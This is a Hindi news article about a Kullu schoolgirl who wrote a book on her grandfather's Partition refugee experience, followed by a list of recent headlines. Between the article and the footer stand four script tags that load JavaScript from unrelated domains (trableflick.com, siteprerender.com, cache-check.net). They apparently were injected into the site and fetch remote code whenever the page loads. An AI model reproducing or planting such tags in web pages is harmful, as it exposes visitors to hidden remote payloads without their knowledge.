Categories: हिमाचल

12वीं की छात्रा ओजस्विनी ने ‘उदगम’ पुस्तक में लिखा भारत पाकिस्तान विभाजन का दर्द

<p>क&zwnj;र्फ्यू में जहां विद्यार्थियों ने घर में रहकर कुछ अलग करने की कोशिश की है, वहीं कुल्लू जिला के शास्त्रीनगर निवासी जमा दो कक्षा की 17 साल की छात्रा ओजस्विनी सचदेवा ने समय का सदुपयोग बड़े अनूठे तरीके से किया। ओजस्विनी ने अपने परदादा नानक और दादा युद्धिष्ठर के जीवनकाल पर आधारित एक पुस्तक &#39;उदगम&#39; लिखकर बड़ी उपलब्धि अपने नाम कर ली है। पुस्तक में भारत-पाकिस्तान के बंटवारे के बाद पाकिस्तान से भारत आए उनके दादा के रिफ्यूजी होने के दर्द को बयां किया है।</p>

<p>ओजस्विनी ने बताया कि रिफ्यूजी कहलाना इतना आसान नहीं है। कई बार आसपास के लोगों से काफी कुछ सुनना पड़ता है। कैंब्रिज इंटरनेशनल स्कूल मौहल में पढ़ने वाली ओजस्विनी बताती हैं कि उसे बचपन से कविताएं लिखने का शौक है। जहां क&zwnj;र्फ्यू में उसने काफी कविताएं लिखी वहीं प्रधानाचार्य सुधा महाजन ने उसे पुस्तक लिखने के लिए प्रोत्साहित किया। उसके बाद उसने 25 मार्च से पुस्तक लिखना शुरू की थी। ओजस्विनी बताती हैं कि जब वह छोटी थी तो उनके दादा की मौत हो गई थी लेकिन रिफ्यूजी होने का दंश उन्हें और उनके परिवार को पहले भी और आज भी झेलना पड़ता है। पिता हितेश कुमार और माता भारती उन्हें हमेशा उनके दादा और परदादा के बारे में बताते रहते थे कि किन परिस्थितियों में वह बंटवारे के बाद भारत आए और यहां पर उन्हें किस तरह की दिक्कत का सामना करना पड़ा।</p>

<p>ओजस्वनि ने बताया कि हालांकि पुस्तक एमेजन पर ही प्रकाशित हुई है। जल्द ही सभी को हार्ड कॉपी उपलब्ध करवाई जाएगी। ओजस्विनी ने बताया कि वह भविष्य में समाजसेवा करना चाहती हैं। ओजस्विनी इससे पहले एक कविता संकलन भी प्रकाशित कर चुकी हैं जिसमें पांच कविताएं हैं। वे कविताओं के माध्यम से युवाओं को संस्कृति को बचाने के लिए प्रेरित करती रहती हैं। पिता व माता ने कहा कि उन्हें गर्व है कि उनकी बेटी ने दादा के दर्द को शब्दों के माध्यम से पुस्तक में पिरोया है, जो उनके लिए सबसे बड़ी श्रद्धांजलि है।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1592824188268″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

9 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

10 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

10 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

10 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

11 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

11 hours ago